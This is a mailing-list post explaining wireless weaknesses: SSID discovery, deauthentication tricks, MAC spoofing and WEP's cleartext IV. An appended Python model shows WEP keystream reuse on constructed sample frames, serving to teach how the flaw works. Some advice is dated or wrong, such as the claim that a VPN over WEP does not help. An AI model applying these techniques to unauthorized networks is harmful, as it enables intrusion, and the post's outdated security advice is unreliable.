I've been worried all night about people thinking that WEP, a network setup, and a changed SSID make a wireless network secure (yes, I do have better things to do, but that doesn't always matter). So here's a synopsis of the inherent weaknesses of wireless. If you want a detailed exposition I'd recommend "Hacking Exposed", 4th edition, McClure, Scambray, and Kurtz. If you know hacking, you know it is authoritative.
Wireless hacking relies on the fact that most of the information necessary for penetration is sent in clear text. It's just a matter of sniffing and analysis, with an occasional nudge at the network to help it cough up the proper information.

It begins by obtaining the SSID. The SSID identifies the network; it's like a domain name. As a matter of convenience to users, the SSID is generally broadcast by the AP, so obtaining it is just a matter of asking with probes or picking it off beacons sent by the access point. If this isn't the case and users actually have to manually enter the SSID, then all a hacker has to do is send a deauthentication frame to knock all users off and pick up the packets when users log back in. How many times do you lose wireless connections and not think anything of it?

MAC access control adds nothing to this. The MAC is unencrypted and therefore trivial to discover. Spoof a MAC and you are in.

WEP encrypts the data portion of a packet but not the header, the IV (initialization vector), or the ID portions of the packet. The IV is used to create the secret key used by WEP for data encryption. The key is based on the 24-bit IV field. This turns out to be a relatively easy scheme to crack. A team of researchers spent $100 on equipment, several hours on coding, and a week's worth of time from start to finish to penetrate a medium-sized wireless network (http://dsonline.computer.org/0207/features/news_2.htm). The solution is to only use WEP which has been modified to mask the IV and which does a better job of randomization than the current WEP algorithm. Some vendors have done this, but they of course cost more.

VPN over WEP will not help. Again, the problem is that only the data portion of the packet is in the tunnel. The IV is still in clear text since that runs on WEP. SSID and key in hand, anyone will have the run of your network. Hiding in plain sight won't help in the end.
An access point might have a range of only 300 ft, but a laptop equipped with a GPS has a much wider range, as do other antennas. A leisurely drive through the neighborhood will map a set of wireless networks. Then it's just a matter of grabbing a few million packets to get the key and SSID. If you want security, do all of the SSID changes, stop the beacons, block the probes, but don't stop there, because that's really only to keep the non-nosey neighbors out.

Ok, that vent is done.

drew

The WDVL Discussion List from WDVL.COM
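As an added worked example (not part of drew's post or anything from the WDVL list), the following Python models the WEP mechanism the post is complaining about. It implements RC4 and WEP's actual per-packet key construction (RC4 key = 24-bit IV || shared secret, with the IV sent in the clear in front of the ciphertext) and then shows what a purely passive sniffer gets from that design: frames can be indexed by their cleartext IV, two frames encrypted under the same IV leak the XOR of their plaintexts, and one frame whose plaintext the attacker knows (the fixed LLC/SNAP header every IP frame starts with, or traffic the attacker provoked, the "nudge" the post mentions) yields the keystream for that IV, which decrypts any other frame under the same IV. The shared key, the IV values and all frame contents below are constructed sample data; WEP's CRC-32 ICV is omitted because it does not affect the argument; and the reused IV is an assumption chosen to illustrate the 24-bit IV space, not a capture from a real network.

```python
"""Toy model of WEP per-packet keying and the keystream-reuse weakness."""
import math
from collections import defaultdict

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # 16,777,216 possible IVs per shared key
IV_LEN = IV_BITS // 8

# The LLC/SNAP header that precedes almost every IP payload on 802.11;
# it is the same in every frame, so it is free known plaintext.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def rc4(key: bytes, length: int) -> bytes:
    """Standard RC4 keystream generator (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP encapsulation: RC4 key is IV || shared key; the IV is transmitted in clear."""
    assert len(iv) == IV_LEN
    return iv + xor(rc4(iv + shared_key, len(plaintext)), plaintext)


def sniff_index_by_iv(frames):
    """What a sniffer with no key can still do: group ciphertexts by their cleartext IV."""
    by_iv = defaultdict(list)
    for frame in frames:
        by_iv[frame[:IV_LEN]].append(frame[IV_LEN:])
    return dict(by_iv)


def keystream_dictionary(known_plaintexts):
    """Build the IV -> keystream table an attacker accumulates.

    known_plaintexts maps a captured frame to as much of its plaintext as the
    attacker knows (just the 8-byte LLC/SNAP header, or a whole frame the
    attacker provoked). ciphertext XOR plaintext = keystream for those bytes.
    """
    table = {}
    for frame, known in known_plaintexts.items():
        iv, ks = frame[:IV_LEN], xor(frame[IV_LEN:], known)
        if len(ks) > len(table.get(iv, b"")):
            table[iv] = ks                    # keep the longest keystream per IV
    return table


def decrypt_frames(frames, table):
    """Decrypt every captured frame as far as the keystream dictionary reaches."""
    return [xor(f[IV_LEN:], table.get(f[:IV_LEN], b"")) for f in frames]


def birthday_packets(p: float = 0.5) -> int:
    """Frames needed before some IV repeats with probability p (birthday bound)."""
    return math.ceil(math.sqrt(2 * IV_SPACE * math.log(1 / (1 - p))))


# Constructed sample traffic (assumed data, not from a real capture).
SHARED_KEY = bytes.fromhex("0123456789")      # 40-bit WEP key, never sent on air
REUSED_IV = bytes.fromhex("000001")           # assumed reuse: many cards restart IVs at 0
VICTIM = LLC_SNAP_IP + b"GET /login?user=alice&pw=hunter2 HTTP/1.0"
PROVOKED = LLC_SNAP_IP + b"ICMP echo request, body attacker chose: " + b"A" * 40


def demo():
    """Passive attack on two frames sharing an IV; returns what the attacker learns."""
    frames = [wep_encrypt(SHARED_KEY, REUSED_IV, VICTIM),
              wep_encrypt(SHARED_KEY, REUSED_IV, PROVOKED)]
    c_victim, c_provoked = sniff_index_by_iv(frames)[REUSED_IV]
    # 1) same IV, no known plaintext: the XOR of the two plaintexts leaks outright
    plaintext_xor = xor(c_victim, c_provoked)
    # 2) only the fixed header known: 8 bytes of keystream, 8 bytes of every frame
    header_only = decrypt_frames(frames, keystream_dictionary({frames[0]: LLC_SNAP_IP}))
    # 3) one fully known (provoked) frame: full keystream for that IV, full decrypt
    full = decrypt_frames(frames, keystream_dictionary({frames[1]: PROVOKED}))
    return {"plaintext_xor": plaintext_xor,
            "header_only": header_only[0],
            "recovered_victim": full[0]}


if __name__ == "__main__":
    r = demo()
    print("victim frame recovered:", r["recovered_victim"])
    print("IV collision expected after about", birthday_packets(), "frames")
```

The point the numbers make: with a 24-bit IV an attacker expects the first IV collision after only a few thousand frames (the birthday bound), and every repeat hands over a keystream relation; an IV that a card resets to zero on every power cycle does even worse. Recovering the shared key itself (the FMS/KoreK statistical attacks, which exploit the IV being the first three RC4 key bytes) is a separate step not shown here; everything above works without ever learning the key.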
